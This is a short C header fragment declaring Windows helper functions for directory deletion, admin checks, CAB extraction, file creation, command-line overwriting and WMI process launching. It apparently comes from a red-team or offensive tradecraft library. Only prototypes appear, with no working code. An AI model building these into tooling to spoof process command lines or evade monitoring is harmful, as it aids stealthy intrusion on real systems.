BOOL DeleteDirectoryAndSubDataViaDelNodeW(LPCWSTR FullPathToDirectory);
BOOL DeleteDirectoryAndSubDataViaDelNodeA(LPCSTR FullPathToDirectory);
BOOL IsProcessRunningAsAdmin2(VOID);
BOOL ExtractFilesFromCabIntoTargetW(LPCWSTR CabFile, LPCWSTR OutputDirectory);
BOOL ExtractFilesFromCabIntoTargetA(LPCSTR CabFile, LPCSTR OutputDirectory);
HANDLE IeCreateFileW(LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
HANDLE IeCreateFileA(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
BOOL RtlSetBaseUnicodeCommandLine(PWCHAR CommandLinePayload);
DWORD CreateProcessFromWmiWin32_ProcessW(LPCWSTR BinaryPath);